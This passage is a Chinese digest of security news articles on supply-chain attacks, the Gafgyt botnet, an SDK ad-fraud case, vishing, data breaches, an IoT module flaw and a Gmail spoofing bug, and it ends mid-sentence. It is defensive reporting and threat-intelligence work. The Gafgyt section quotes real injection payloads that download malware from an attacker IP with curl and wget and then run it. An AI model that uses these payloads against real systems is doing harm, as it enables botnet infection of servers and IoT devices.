内容转载

= ̄ω ̄= 内容转载

开源和云原生带来的下一代软件供应链,正面临新的攻击

恶意网络攻击者对软件供应链的攻击,正向“上游”组件蔓延,再借助开源软件的“信任链”和影响力,导致的结果之一就是破坏性更大。Sonatype 的《2020软件供应链报告》报告提出,下一代软件供应链攻击正在到来,显著特点就是刻意针对“上游”开源组件,进行更主动的攻击。而此类攻击出现的背景正是开源组件和容器的广泛采用。 软件供应链及攻击 软件供应链一词常出现在科技公司和研究人员的表述中,Dell EMC 的产品管理总监 John Mark Walker 曾通过对比硬件供应链,描述传统软件供应链。 他认为,硬件的供应链是来源于不同地区的、许多不同合作伙伴的零部件,传统软件供应链大多是定义企业内部制作软件,以及从第三方获得一些商业软件的过程。在此模式下,供应链上的大部分来源于公司内部,可能来自多个工程团队,一小部分软件来源于公司外部,因此供应链主要由内部产品定义,工程团队负责管理。另外来自第三方供应商的软件在组合时需要做合规检查,获得许可。 (简单的、一般的传统软件供应链) 另一个流传较广的定义是按照阶段划分,认为软件供应链通常包括三个阶段:软件研发阶段、软件交付阶段、软件使用阶段。 这种划分通常也有助于区分不同种类的软件供应链攻击,许多大型科技公司对此都有专门的讨论。腾讯安全平台曾总结软件供应链攻击环节,阿里巴巴的工程师也曾例举不同阶段的攻击面: 一是生产节点被攻击,包括软件开发涉及到的软硬件开发环境、开发工具、第三方库、软件开发实施等等,软件开发实施的具体过程还包括需求分析、设计、实现和测试等,软件产品在这一环节中形成最终用户可用的形态。软件研发阶段的攻击面包括 IDE 开发工具污染攻击、三方库漏洞和后门攻击、直接源码污染攻击。 二是交付阶段,交付节点被攻击,如软件上线的平台、硬件。用户通过软件官网、公共仓库、在线商店、免费网络下载、购买软件安装光盘等存储介质、资源共享等方式获取到所需软件产品的过程。受攻击对象比如著名的软件下载站、Python 官方镜像源、Github 等。 攻击面如软件存储替换和篡改攻击、传输劫持和捆绑下载攻击。 三是软件使用阶段,使用节点即软硬件的使用者被攻击。使用软硬件产品的整个生命周期,包括产品更新升级、维护等过程。 攻击面包括升级劫持污染攻击、运行环境后门和了漏洞攻击、三方库 0Day 漏洞攻击。 以上是从定义方面,较为宽泛地看传统软件供应链以及一般软件供应链攻击。但随着云原生和开源的发展,一些新的看法与攻击出现了。 开源与云原生时代的软件供应链 前文 John Mark Walker 所说的传统软件供应链,是在对比包含更多开源组件的软件供应链。John Mark Walker 认为,随着开源软件应用在增多,情况已经变得混乱了:未经验证的许可证、未经测试的仓库、以及狂野的开发者,这些要素使得软件供应链看上去似乎不可管理。开源导致至少增加了一个额外的层次: 某个角度看,开源组件插入到产品中,和第三方商业组件插入到产品中,并没有本质差别。但实际上,关于上游开源组件,多数源代码仓库没有任何商业保证。此时要么是建立自己内部的审核代码和应用产品管理流程的方法,或者是靠中间厂商,即采用开源软件的商业发行版,如 RedHat 和 SUSE 提供的 Linux 企业版产品。 与开源密切相关,并改变传统软件供应链的还有云原生。容器概念和 Docker、Kubernetes 等项目的出现,改变了软件的交付方式,进而影响到软件供应链。 阿里技术团队曾总结容器和 Kubernetes 的引入带来的安全软件供应链管理变化: 发布和迭代更加频繁,容器的易变性也使得安全风险稍纵即逝; 更多的不可控三方依赖,一旦一个底层基础镜像有了安全漏洞,会向病毒一样传递到上层; 更大范围的全球快速分发,在分发过程中的攻击也会使得在末端执行的时造成大规模安全风险。 《2020软件供应链报告》中提到的“下一代软件供应链”攻击的变化,也正是基于开源和与原生的发展——下一代软件攻击数量激增的背景是,开源加速了创新,也带来大规模的使用,到2020年,世界各地的开发者对开源软件组件和容器的需求,将超过1.5万亿个。同时,攻击也正在积极针对开源项目。 下一代软件供应链攻击已主动向“上游”感染 供应链成为攻击媒介已经不是新发现了。Symantec 的调查显示,2017年供应链网络攻击激增200%;2018年,CrowdStrike 的供应链安全性调查结果显示,80%的 IT 专业人员认为软件供应链攻击将是企业组织在未来三年中将面临的最大网络威胁之一…… 这次的《2020软件供应链报告》提出了“下一代”的软件供应链攻击正在到来,特点是攻击更加主动,波及范围更广。 数据显示,在过去12个月,旨在大举渗透开源的下一代网络攻击数量增加了430%。攻击者正在利用软件供应链达成杠杆和规模效应。同时,下一代的软件供应链攻击更加险恶,因为攻击者不再是等待公开披露的开发源码漏洞,而是主动、积极地将恶意代码注入为全球供应链提供信息的开源项目,通过感染“上游”组件,向“下游”扩散。 出现此种情况的可能原因有三个: 开源项目是协作的,有时难区分良好和恶意的社区成员; 开源项目通常包含来自其他开源项目成百上千的依赖项,依赖项中可能含有已知漏洞; 开源精神是建立在全球社区的“共同信任”之上,这便于攻击者轻松达成目的。 最常见的是类型攻击,这是一种间接攻击向量。此类攻击在搜索流行组件时攻击开发人员,是他们犯一些无辜的错误。如开发人员想要获取“Iodash”源代码,却意外地输入了“Iodahs”,那么他们可能会意外地安装一个名称类似的恶意组件。 另一常见的是恶意代码注入。如今年5月,GitHub 安全博客警告了针对 Apache NetBeans IDE 项目的开源供应链攻击 Octopus Scanner。最终统计显示,有26个开源项目被植入了 Octopus Scanner 后门。一旦感染,恶意程序会寻找用户开发系统上的 NetBeans 项目,然后将恶意负荷嵌入项目文件,每次构建都会执行恶意负荷。 如何使开源软件供应链更可信 事实上,随着软件供应链攻击的增加,企业和开发者也需要做些什么来保障安全,提高软件供应链的可信度。 《2020软件供应链报告》认为,选择开源项目应该是企业软件开发团队的重要战略决策。包括识别模范的开源供应商,具有更新依赖性的项目更加安全。报告建议项目团队应该力争每年至少发布4个版本,并在每个版本中升级至少80%的依赖项,更高频率的依赖更新会带来更高的质量和更安全的代码。 报告还指出,面对更加恶意的软件供应链攻击,防御的速度仍是关键。一直以来,所有开发者和企业都牢记面对恶意攻击时,要积极响应。不过该报告此处尤指开源软件,组织必须建立起一个“快速升级态势”,这样他们就可以通过发现和修复生产应用程序中、脆弱的开源依赖关系,来快速响应新的漏洞披露。 除了报告中提到的“快速升级态势”,态势感知也是近年来常被用于确保网络安全的方式。 “态”强调当前状态,“势”强调未来发展的趋势。网络安全领域的态势感知,最重要的是全局视角提升对威胁的发现识别、理解分析、响应处置。态势感知基于基于环境的、动态、整体地洞悉风险的能力,以大数据为基础,最终是为了决策与行动,是预测能力的落地,也可看做一种“事前”发现的方式。 具体方式包括通过收集云上安全组件信息、关联分析组件提供的海量日志等,全面感知威胁,得出可被理解的安全事件。又或是通过人工智能技术,深度挖掘数据,预测云上资产可能面临的风险。 最后报告再次提及开源及其安全的重要度:10个开源软件下载中有1个是脆弱的,而开源组件占到了现代应用的90%。其研究发现生产力不一定要以降低安全性为代价。在供应端,通过对部分开源项目的研究发现,频繁的代码更新、依赖更新和发布会带来更好的结果,更新越频繁,开源项目通常越安全。 综上,无论是供应端还是需求端,建议都是快速行动,包括快速更新、快速应对。开源或许在某种层面上导致风险更大,但合理利用开源的协同开发,快速发布,也是解决这些风险的绝佳方式。     (稿源:OSCHINA,封面来自网络)

AI 关键基础设施正面临三重风险 人脸识别有漏洞

360公司表示,AI关键基础设施正面临三重风险,包括某些人脸识别设备能让任意人通过,不仅AI算法存在漏洞,其所依赖的关键基础设施也同样会被攻击。 360 AI安全研究院表示,目前AI的三重风险包括:学习框架风险、硬件风险及云平台风险。 第一,针对深度学习框架安全风险。深度学习框架主要可以划分为云端学习框架和终端学习框架。云端框架安全风险主要来自于自身代码的实现以及第三方的依赖库问题;终端框架安全风险主要存在于模型网络参数、模型网络结构,以及模型转换过程。 第二,针对硬件相关的安全风险。据英伟达官网统计,截至今年7月,关于GPU驱动漏洞的数目达到数百个;芯片漏洞以幽灵、熔断为例,幽灵漏洞可以造成泄露敏感数据、执行特定代码,熔断漏洞导致用户态获取特权内存的数据,这些漏洞影响了Intel、部分ARM的处理器。 第三,针对云平台的安全风险。用于深度学习任务的节点性能强大,因此总会有一些攻击者想要非法使用这些资源进行挖矿。比如,今年6月,微软通报部分Kubeflow存在未授权访问的问题,导致大量设备被非法挖矿。 “只有在确保AI系统的安全,才有可能放心享受AI的便利,那么保证系统中AI关键基础设施的安全至关重要”,360 AI安全研究院表示,AI关键基础设施的安全问题可以通过权限控制、访问隔离、参数过滤等措施进行缓解,针对AI关键基础设施的安全问题,需要建立多维度、一体化风险评估方法以及对应防御措施。(大鹏)     (稿源:新浪科技,封面来自网络)

警惕 Gafgyt 僵尸网络对国内 Linux 服务器及 IoT 设备的攻击

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/fUOracfMmKfj5RT2llMVpg   一、背景 腾讯安全威胁情报中心检测到有境外IP针对国内Linux服务器的远程命令注入攻击。黑客通过批量扫描80、5555、60001端口来发现易受攻击的Linux服务器、android设备以及监控摄像头设备并利用ZeroShell远程代码执行漏洞(CVE-2019-12725)、bash shell漏洞、JAWS Webserver未授权shell命令执行漏洞进行攻击,攻击成功后下载Gafgyt家族木马。 Gafgyt是一种流行的僵尸网络程序,被认为是Mirai的前身,其源代码在2015年初被部分泄露。Gafgyt主要通过telent弱口令以及命令注入漏洞等方式进行攻击传播,通过感染基于Linux的IoT设备(包括基于Linux系统的路由器、智能摄像头等设备)来发起DDoS攻击,攻击类型以UDP、TCP和HTTP攻击为主。   腾讯安全系列产品应对Gafgyt僵尸网络的响应清单: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Gafgyt僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Gafgyt僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)   Gafgyt僵尸网络关联的IOCs已支持识别检测; 2)   检测利用Zeroshell漏洞的命令注入攻击; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)    已支持查杀Gafgyt僵尸网络相关木马程序; 2)    告警弱口令爆破行为; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)   已支持通过协议检测Gafgyt僵尸网络木马与服务器的网络通信; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、详细分析 腾讯安全专家在日常安全巡检过程中发现攻击线索,腾讯云防火墙检测到攻击来源52.224.202.238:43787,针对目标系统80端口的命令注入攻击。 该攻击的payload为: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*”;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” HTTP/1.0 分析发现这次攻击利用的是ZeroShell远程代码执行漏洞(CVE-2019-12725),该漏洞在2019年7月被发现,攻击者可以通过构造具有固定特征的请求数据发送至目标系统,从而导致恶意代码执行。(ZeroShell是一套用于服务器和嵌入式设备的Linux发行版,它主要为局域网提供所需要的网络服务) 漏洞攻击成功后通过curl命令下载执行shell脚本zero,zero继续通过curl下载Gafgyt木马bot.x86_64和bot.x86并启动执行,分别为64位和32位木马文件。 bot.x86为Gafgyt僵尸网络家族木马样本,启动后首先打印特征字符串“9xsspnvgc8aj5pi7m28p”。 然后针对Linux服务器、android设备、视频监控设备的80、5555、60001端口进行扫描。 针对开放端口的设备利用ZeroShell远程代码执行漏洞(CVE-2019-12725)攻击,执行payload: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*“;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” 利用bash shell漏洞攻击,执行payload: shell[:]cd /data/local/tmp; busybox wget http[:]//5.206.227.228/wget -O -> wwww; sh wwww; curl -O http[:]//5.206.227.228/curl; sh curl;rm wwww curl 利用JAWS Webserver未授权shell命令执行漏洞攻击,执行Payload: GET /shell?cd /tmp;wget http[:]//5.206.227.228/jaw;sh jaw;   ZeroShell远程代码执行漏洞(CVE-2019-12725)的攻击流量:   IOCs IP 5.206.227.228 URL http[:]//5.206.227.228/zero http[:]//5.206.227.228/curl http[:]//5.206.227.228/wget http[:]//5.206.227.228/k http[:]//5.206.227.228/bot.x86_64 http[:]//5.206.227.228/bot.x86 http[:]//5.206.227.228/bot.arm5 http[:]//5.206.227.228/bot.arm6 http[:]//5.206.227.228/bot.arm7 http[:]//5.206.227.228/bot.aarch64 http[:]//5.206.227.228/bot.mips http[:]//5.206.227.228/bot.mipsel MD5 2520fc7d13ac3876cca580791d1c33a8 cc84fcc23567228337e45c9fbb78699f 10b9f21795e5ffbd52c407617d0bd4ef 38d8de098c7e560a34dabf8c1a2ed5f0 12b021bcd199585e86dd27523010105b 0e12d891a2fe2cecb6781f3e4d3551b4 aa389e7fb64cf274334712ecb3dfd2cd 2dabb8e039a77f0eb67e938d798ab7c4 03a7f039321ffb9938cc67d65c0b6459 a9109419954a421b712d48ea22b0a7b9 52fb891c536fe449b896f0f2cd2490d4 e2cec25584bfec1e56ee82f350dfeaf9 87859507c0d23793c78d86e0963a7a37 ba903efc3d2e37105e57232e7652b85c 891bbf7b562b34332fac12df2c29ddbb 6d9953a03c568ad97595723d1a09b291 aa9e9627ed6aba6415fb45f742f4f8dd 参考链接: https://www.anquanke.com/vul/id/1030688 https://www.tarlogic.com/advisories/zeroshell-rce-root.txt https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ https://github.com/ifding/iot-malware

iOS 开发者套件 Mintegral 被爆窃取点击广告收入

使用一款流行的 iOS 软件开发套件开发的多款应用程序中,发现了能够窃取广告内点击收入的恶意代码。根据网络安全公司 Snyk 发布的报告,在广告平台 Mintegral 的 SDK 中发现了这些恶意代码。而该 SDK 已经被超过 1200 个应用使用,这些应用每月的下载量合计达 3 亿次。 与其他广告相关的 SDK 一样,Mintegral 套无需花费太多精力或进行额外的编码情况下,允许开发者在其应用中嵌入广告。Mintegral在 iOS 和 Android 上都向开发者免费提供了该 SDK。 根据 Snyk 介绍,iOS 版本的软件套件包含恶意功能,会静静地等待用户点击任何不属于Mintegral 网络的广告。当点击注册后,SDK会劫持推荐过程,并使其看起来用户实际上是在点击 Mintegral 广告。 该恶意代码被称之为“SourMint”,正在从其他广告网络中窃取应用收入,许多应用程序使用多个广告SDK来实现其货币化策略的多样化。 苹果在给ZDNet的邮件中表示,已经与Snyk安全研究人员进行了交流,没有看到任何证据表明SDK对用户造成了伤害。苹果指出,第三方SDK能够加入恶意功能,这也是它在2020年晚些时候发布的iOS 14中首次推出一系列注重隐私和安全的机制的原因。     (稿源:cnBeta,封面源自网络)

FBI、CISA 对企业虚拟专有网访问凭据攻击“Vishing”带来的威胁发出警告

美国联邦调查局(FBI)和网络安全与基础设施安全局(CISA)周四发布联合预警,警告针对公司的语音钓鱼或 “vishing “攻击的威胁越来越大。在发布深入研究一个提供服务的犯罪集团后不到24小时,KrebsOnSecurity就发表了一篇文章,该集团提供的服务是人们可以在COVID-19大流行期间雇用他们从远程工作的员工那里窃取VPN凭证和其他敏感数据。 “COVID-19大流行导致大规模转向在家工作,导致企业虚拟专用网络(VPN)的使用增加,在2020年7月中旬,网络犯罪分子开始了一场名为vishing的活动–以无差别获得多家公司员工工具的访问权–最终目标是将访问权货币化。” 正如周三的报道所指出的那样,这些机构表示,攻击者设置的钓鱼网站往往连字符、目标公司的名称和某些词语都非常具有指向性–如 “支持”、”票据 “和 “员工”。作案者专注于对目标公司的新员工进行社会工程,并冒充目标公司IT服务台的工作人员。 FBI/CISA的联合警报称,vishing团伙还利用社交媒体平台上的公共档案、招聘人员和营销工具、公开的背景调查服务以及开源研究,大规模搜刮特定公司的员工档案。从警报中可以看出。 “作案者先是使用未经归属的网络电话(VoIP)号码 拨打目标员工的个人手机,随后开始结合其他办公室和受害者公司员工的虚假号码。行为人使用社会工程技术,在某些情况下,冒充受害者公司IT服务台的成员,利用他们对员工个人身份信息的了解–包括姓名、职位、在公司的时间和家庭住址–来获得目标员工的信任。” “然后,行为人说服目标员工将发送一个新的VPN链接,并要求他们登录,包括任何2FA[双因素认证]或OTP[一次性密码]的安全凭据也一并通过这种方法获取,随后他们记录员工提供的信息,并实时使用该员工的账户访问企业工具。” 警报指出,在某些情况下,毫无戒备的员工批准了2FA或OTP提示,或者是意外地批准了。除此之外,攻击者能够通过针对员工的SIM卡交换来拦截一次性代码,这涉及到移动电话公司的社会工程人员,让他们控制目标的电话号码。 这些机构表示,骗子利用被盗用的VPN凭证在受害者公司数据库中挖掘客户的个人信息,以便在其他攻击中加以利用。 “然后,行为人利用员工的访问权限对受害者进行进一步的研究,和/或使用取决于被访问的平台的不同方法来欺诈性地获得资金,”警报中写道。”货币化方法根据公司的不同而不同,但具有高度的侵略性,在最初的违规行为和破坏性的兑现计划之间有一个紧凑的时间表。” 该警告包括一些公司可以实施的建议,以帮助减轻这些vishing攻击的威胁,包括。 – 限制VPN连接仅用于受管理设备,使用硬件检查或安装证书等机制,因此仅靠用户输入不足以访问企业VPN。 – 在适用的情况下,限制VPN的访问时间,以减轻允许时间以外的访问。 – 采用域名监控,跟踪企业、品牌域名的创建或变更。 – 积极扫描和监控网络应用,以防止未经授权的访问、修改和异常活动。 – 采用最低权限原则,实施软件限制政策或其他控制措施;监控授权用户的访问和使用。 – 考虑对通过公共电话网络进行的员工与员工之间的通信采用正式的认证程序,并在其中使用第二种因素,以在讨论敏感信息之前,对电话进行认证。 – 改进2FA和OTP信息传递,以减少员工认证尝试的混乱。 – 确认网络链接没有拼写错误或包含错误的域名。 – 将正确的企业VPN URL加入书签,不要仅凭呼入的电话访问其他URL。 – 对自称来自合法组织的不明身份者的主动电话、访问或电子邮件信息要保持警惕。不要提供个人信息或有关您的组织的信息,包括其组织结构、组织结构和组织结构。     (稿源:cnBeta,封面源自网络。)

免费图像网站 Freepik 披露数据泄露事件 影响 830 万用户

致力于提供高质量免费照片和设计图形访问的网站Freepik今天披露了一起重大安全漏洞。在本周用户开始在社交媒体上抱怨他们的收件箱中收到了违规通知邮件后,该公司正式宣布了这一消息,从而确认了过去几天向注册用户发送的邮件的真实性。 根据该公司的官方声明,此次安全漏洞发生在一名黑客(或多名黑客)利用SQL注入漏洞访问其一个存储用户数据的数据库之后。Freepik表示,黑客获得了其Freepik和Flaticon网站上最老的830万注册用户的用户名和密码。 Freepik没有说明漏洞发生的时间,也没有说明它是何时发现的。不过,该公司表示,在得知这一事件后,立即通知了有关部门,并开始调查这一漏洞以及清点黑客获取的内容。至于被取走的内容,Freepik表示,并不是所有用户的账户都有相关的密码,黑客只取走了部分用户的信息。 该公司将这一数字定为450万,其中包括使用第三方联合登录账户的用户(谷歌、Facebook或Twitter)。 “对于剩下的377万用户,攻击者得到了他们的电子邮件地址和密码的哈希值,”该公司补充道。”散列密码的方法是bcrypt,还有22万9千名用户的方法是saltted MD5。随后,我们已经将所有用户的哈希值更新为bcrypt。” 该公司表示,现在正在根据被采取的措施,用定制的电子邮件通知所有受影响的用户。这些邮件将发给Freepik和Flaticon用户,这取决于用户在什么服务上注册过。Freepik是当今互联网上最受欢迎的网站之一,目前在Alexa百强网站排行榜上排名第97位。Flaticon也不甘落后,排名第668位。 当EQT在今年5月底收购Freepik公司时,该公司宣称Freepik服务拥有超过2000万注册用户。 Freepik公司的另一家网站Slidesgo的注册用户似乎没有受到影响。     (稿源:cnBeta,封面源自网络)

新的物联网基础模块漏洞可能使全球大量设备面临安全风险

社会对技术的依赖程度非常高,预计到2025年,全球使用的互联网连接设备数量将增长到559亿台。这些设备中的许多设备涵盖了工业控制系统(ICS)的各个部分,它们影响着世界,协助我们在家中的日常生活,并监控和自动化生产工作中从能源使用到机器维护的一切。滥用这些系统的潜力已经引起了网络犯罪分子的注意;根据2020年IBM X-Force威胁情报指数,自2018年以来,针对这些系统的攻击增加了2000%以上。 作为持续研究的一部分,IBM的黑客团队X-Force Red发现了一个新的物联网漏洞,可以被远程利用。制造商泰雷兹自2020年2月起向客户提供了CVE-2020-15858的补丁,X-Force Red一直在合作,以确保用户了解该补丁,并采取措施保护他们的系统。 在今天使用的数十亿智能设备中,泰雷兹是使它们能够连接到互联网、安全存储信息和验证身份的组件的供应商之一。泰雷兹的整个产品组合每年连接超过30亿个设备,从智能能源表到医疗监控设备和汽车,有超过3万家机构依赖其解决方案。 然而,在2019年9月,X-Force Red发现了泰雷兹(原金雅拓)的Cinterion EHS8 M2M模块中的一个漏洞,该模块在过去十年中被用于数百万个互联网连接设备。经过进一步的测试,泰雷兹确认该漏洞会影响到EHS8同一产品线中的其他模块(BGS5、EHS5/6/8、PDS5/6/8、ELS61、ELS81、PLS62),进一步扩大了该漏洞的潜在影响。这些模块是实现物联网设备移动通信的微型电路板。 更重要的是,它们存储和运行的Java代码通常包含密码、加密密钥和证书等机密信息。利用从模块中窃取的信息,恶意行为者有可能控制设备或获得中央控制网络的访问权,从而进行广泛的攻击–在某些情况下甚至可以通过3G远程攻击。利用这个漏洞,攻击者有可能指示智能电表打掉一个城市的电力,甚至给医疗病人注射过量的药物,只要负责这些关键功能的设备使用的是一个暴露在攻击者面前的未打补丁的模块,例如,通过这个模块启用的3G/4G连接。 关于该漏洞 EHS8模块及其系列中的其他模块,旨在通过3G/4G网络实现连接设备之间的安全通信。将该模块视为相当于一个值得信赖的数字锁箱,公司可以在其中安全地存储密码、凭证和操作代码等一系列秘密。这个漏洞破坏了这一功能,允许攻击者窃取组织机密。 X-Force Red发现了一种绕过安全检查的方法,这种检查可以使文件或操作代码对未经授权的用户隐藏起来。这个漏洞可能使攻击者能够入侵数百万台设备,并通过转入提供商的后端网络来访问支持这些设备的网络或VPN。反过来,知识产权(IP)、凭证、密码、加密密钥都可能被攻击者轻易获得。换句话说,模块存储的机密信息可能不再是机密。攻击者甚至可以抢夺应用程序代码,彻底改变逻辑,操纵设备。 潜在的影响是什么? 这个漏洞的潜在影响根据攻击者可能入侵使用这一行模块的哪些设备而有所不同。据了解,全球有数百万台设备使用该模块,横跨汽车、医疗、能源和电信行业。 鉴于其中许多设备的关键性,有针对性的网络攻击可能会很重要。以下是一些例子,说明如果在各种类型的设备中暴露出未打补丁的模块,攻击者可能会做什么。 医疗设备: 操纵监测设备的读数来掩盖生命体征或制造虚假恐慌 在根据输入提供治疗的设备中,如胰岛素泵,网络犯罪分子可能会使患者用药过量或不足。 能源和公用事业。篡改智能电表,提供伪造的读数,增加或减少每月的账单。通过控制网络访问一大群这些设备,恶意行为者还可以关闭整个城市的电表,造成大范围的停电,需要进行单独维修,甚至更糟糕的是,破坏电网本身。 技术细节 EHS8模块与该系列的其他模块一样,由一个微处理器组成,内嵌Java ME解释器和闪存,以及GSM、GPIO、ADC、数字和模拟音频、GPS、I2C、SPI和USB接口。它还提供了更高层次的通信堆栈,如PPP和IP。嵌入式Java环境允许安装Java “midlet”,以提供可定制的功能和与主机设备的交互,和/或作为主逻辑。该模块在基本的OEM集成商层面上运行时,其行为很像传统的 “Hayes”调制解调器。这意味着,除了加载到系统中的Java应用程序外,还可以通过内置在电路中的物理UART连接使用 “AT “串行命令进行控制。 在安全研究实践中,Java应用程序可以被绕过,并将控制权交还给低层,允许攻击者直接控制模块。一旦控制了AT命令接口,就可以发出大量的标准命令,如 “ATD”–拨号,或 “ATI”–显示制造商信息。还有一些配置命令和用于访问覆盖在闪存上的基本文件系统的特定命令子集–“AT^SFA”。这提供了文件和子目录的读、写、删除和重命名。 为了方便Java环境,还有一些与Java相关的命令,其中一个命令是 “安装 “先前上传到闪存文件系统的Java midlet。这可以有效地将Java代码复制到闪存文件系统中的 “安全存储 “中,理论上是 “只写 “的–即数据可以复制到该存储中,但永远不会被读回。这样一来,OEM厂商包含其IP的私有Java代码,以及任何安全相关的文件,如PKI密钥或证书和应用相关的数据库,都可以防止第三方窃取。 然而,X-Force Red发现的漏洞允许对隐藏区域进行完全的读、写、删除访问(尽管Thales已经针对特定的文件类型进行了额外的检查)。这将允许攻击者读出系统上运行的全部java代码(包括OEM midlets和Thales的主 “主”代码),以及他们可能拥有的任何其他 “隐藏 “支持文件。 由于Java很容易被反转为人类可读的代码,这可能会暴露任何应用程序的完整逻辑以及任何嵌入的 “秘密”,如密码、加密密钥等,并使IP窃取成为一个非常简单的操作。掌握了这些数据,攻击者可以很容易地创建 “克隆 “设备,或者更可怕的是,修改功能以实现欺诈或恶意活动。 带有漏洞的代码列表 上图显示了该漏洞存在于计算路径子串中的字符数并检查第四个字符是否为点(字符数组中的第三个索引)的代码中。在正常情况下,任何访问带有点前缀的隐藏文件的尝试都会被拒绝(例如:a:/.hidden_file)。然而,用双斜线代替斜线(例如:a://.hidden_file)将导致条件失败,代码执行将跳转到一个字符检查循环,该循环将匹配任何可打印字符。在第二个斜线之后,系统将忽略它,没有什么能阻止攻击者使用点前缀的文件名,绕过安全测试条件。 责任披露和补救 泰雷兹公司与X-Force Red团队合作,在2020年2月测试、创建并向其客户分发补丁。 补丁可以通过两种方式管理–通过软件插入USB运行更新,或者通过管理空中(OTA)更新。这个漏洞的补丁过程完全取决于设备的制造商和它的能力,例如,设备是否可以访问互联网,可能会使它的工作变得复杂。另一项需要注意的是,设备越是受监管(医疗设备、工业控制等),应用补丁的难度就越大,因为这样做可能需要重新认证,这往往是一个耗时的过程。 我们要赞扬泰雷兹公司对这一缺陷的处理,并花费大量时间与客户合作,以确保他们了解补丁并采取步骤保护用户的安全。关于CVE-2020-15858的更多信息可以在https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15858页面当中找到。     (稿源:cnBeta,封面源自网络)

Twitter 数据泄露案存分歧 欧盟或推迟对科技巨头隐私调查

在对Twitter 2019年被披露的数据泄露事件处以多少罚款的问题上,欧盟隐私监管机构——爱尔兰数据保护委员会(DPC)内部产生分歧,这可能导致该机构对美国四大科技巨头的调查也出现分歧和延迟。 此案涉及Twitter在2019年1月修复的一个安全漏洞,在此前四年多的时间里,该漏洞暴露了许多用户的私人推文。DPC在其2019年年报中表示,此案的焦点在于Twitter是否履行了及时通知用户发生黑客袭击事件的义务。 DPC周四在一份声明中披露了有关此案存在的分歧,这是对2018年生效的《通用数据保护条例》(GDPR)执法的重大考验之一。这让人担心,根据这项法律,针对Facebook、谷歌、亚马逊以及其他美国科技公司的近20多项调查可能会出现分歧和拖延。 这些调查由DPC牵头,因为上述这些公司都在爱尔兰设有地区总部,但其他26个欧盟国家的相应监管机构可以在涉及它们的案件中提出反对意见。 DPC周四表示,在未能解决对其在Twitter案件中的分歧后,该机构启动了欧盟隐私监管机构之间的争端解决机制,这是该程序首次启动。Twitter案件是个风向标,因为这是DPC第一次将决定草案转发给同行征求意见。 Twitter没有立即回复记者的置评请求。DPC拒绝评论哪些同行反对其拟议的决定,或基于什么理由,但反对意见可能与其机制和罚款金额有关。 根据GDPR规定,监管机构可以对未能在72小时内通知数据泄露事件的公司处以最高相当于其全球年收入2%的罚款,基于Twitter 2019年的收入,罚款金额可能高达6900万美元。然而,该法律指示监管机构考虑违规行为的严重性和持续时间、有争议的个人信息类型以及其他因素,例如违规行为是否是故意的。 Twitter案件的最终结果将为欧盟在监管机构之间的权力分享体系在实践中如何运作提供借鉴。根据这项法律,在涉及多个国家的案件中,主要监管机构(如DPC)会将其决定草案发送给同行。他们有四周的时间提交“相关且合理的”反对意见,还需要有额外的时间来批准基于这些反对意见的修订。 监管机构无法解决的任何分歧都可以提交给欧洲数据保护委员会,该委员会将通过投票决定。这个过程持续一个月,但可以延长到两个月,然后再延长两周。根据法律文本,一旦委员会批准了一项决定,主要监管机构需要在1个月内通知公司。     (稿源:网易科技,封面源自网络)

谷歌在 Gmail 漏洞公布七小时后部署了缓解措施

早在 4 个月前,安全研究员 Allison Husain 就已经向谷歌通报了一个影响 Gmail 或 G Suite 客户的电子邮件欺诈漏洞。遗憾的是,尽管给足了 137 天的时间,谷歌仍选择拖到 9 月份的某个时候再修复这个 Bug 。讽刺的是,在 Allison Husain 将详情公布后不久,谷歌团队就于 7 小时内在服务器端部署了缓解措施,以便能够撑到 9 月的正式修复。 据悉,该漏洞使得攻击者可发送模仿任何 Gmail 或 G Suite 客户的欺骗性电子邮件。 此外 Allison Husain 指出,该 bug 还使得邮件附件能够骗过发件人策略框架(SPF)和基于域的消息身份验证(DMARC)这两项最先进的邮件安全标准。 遗憾的是,搜索巨头在漏洞修复上有些不够积极,甚至一度想拖到 9 月份再正式修复。直到 Allison Husain 于自己的博客上披露了概念验证漏洞代码,谷歌工程师才于昨日改变了主义。 博文上线 7 小时后,谷歌向 Allison Husain 表示,该公司已在服务器端部署了缓解措施。 至于这个 Gmail(G Suite)Bug 本身,实际上是两个因素的结合,首先是攻击者可将欺骗性的电子邮件发送到后端网关。 其次是利用自定义邮件路由规则、以接收传入的电子邮件并将其转发,同时借助变更收件人的本地功能来骗过 Gmail 或 G Suite 客户。 利用此功能转发的好处是,Gmail / G Suite 会遵从 SPF 和 DMARC 安全标准来验证欺骗性转发的电子邮件。因源于 Google 后端,其垃圾邮件评分也可能较低,从而减少了被过滤系统拦截的可能。 Allison Husain 指出,这两个 bug 